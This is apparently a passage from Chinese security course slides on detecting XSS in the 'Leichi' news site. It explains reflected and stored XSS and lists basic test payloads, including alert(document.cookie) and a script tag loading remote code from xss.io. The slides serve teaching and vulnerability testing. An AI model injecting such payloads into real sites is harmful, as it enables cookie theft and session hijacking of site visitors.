雷弛网站XSS漏洞检测.pdfVIP

计 算 机 机 计 机 计 网 计 网 技 网 技 安 技 算 安 算 安 算 络 络 术 络 术 全 术 全 全 雷弛网站XSS 漏洞检测 雷弛网站XSS漏洞检测 跨站脚本 （Cross-Site Scripting ，XSS ），简称XSS 是避免 和CSS(Cascading Style Sheets ，层叠样式表) 同名。 XSS 是一种经常出现在Web 应用程序中的安全漏洞，攻击者 利用网站漏洞把恶意的脚本代码 （通常包括HTML代码、客户 端Javascript脚本等客户端浏览器能够执行的代码）注入到网页 之中，当其他用户浏览这些网页时，就会执行其中的恶意代码， 对受害者可能采取Cookie 资料窃取、会话劫持、钓鱼欺骗等攻 击。XSS 是由于Web 应用程序对用户的输入过滤不足而产生的。 雷弛网站XSS漏洞检测 因为攻击者植入的代码是在浏览器能够执行的。所 以XSS 跨站脚本攻击本身对Web服务器没有直接危 害。攻击者一般通过留言、电子邮件或其他途径向 受害者发送一个精心构造的恶意URL ，当受害者在 Web 浏览器中打开该URL 的时候，恶意代码 （仅限 于浏览器能够执行的）会在受害者的计算机上悄悄 运行，流程如图所示： 雷弛网站XSS漏洞检测 雷弛网站XSS漏洞检测 XSS 攻击主要分为两种： ① 反射型XSS 。主要用于将恶意脚本附加到URL 地址的参数中，因此是 一种非持久型的脚本，从技术角度讲，这种主要是基于网页DOM 结 构的攻击。 ② 存储型XSS 。将恶意代码储存到了服务器上，通常是数据库中。是一 种持久型的脚本。持久型XSS 不需要用户去单击URL 进行触发，所以 他的危害比反射型XSS 大。存储型XSS 一般出现在网站的留言、评论。 博客日志等交互处，恶意脚本被存储到服务器的数据库中，当其他用 户浏览该网页时，站点即从数据库中读取恶意用户存入的非法数据， 返回给受害者，受害者主机上的浏览器会执行这些代码，从而就产生 危害。 一、实验案例：检测雷弛新闻系统中存在的XSS漏洞 1.基本检测语句 scriptalert(XSS)/script /scriptalert(document.cookie)/script!-- script src=http://xss.io/a.js/script onclick=alert(document.cookie) div onclick=alert(xss) div onmouseenter=alert(xss) 一、实验案例：检测雷弛新闻系统中存在的XSS漏洞 查看雷弛的网页，发现有一个搜索功能可以输入文字，随便输入 进行搜索，得到以下URL ， 54/search.asp?key=11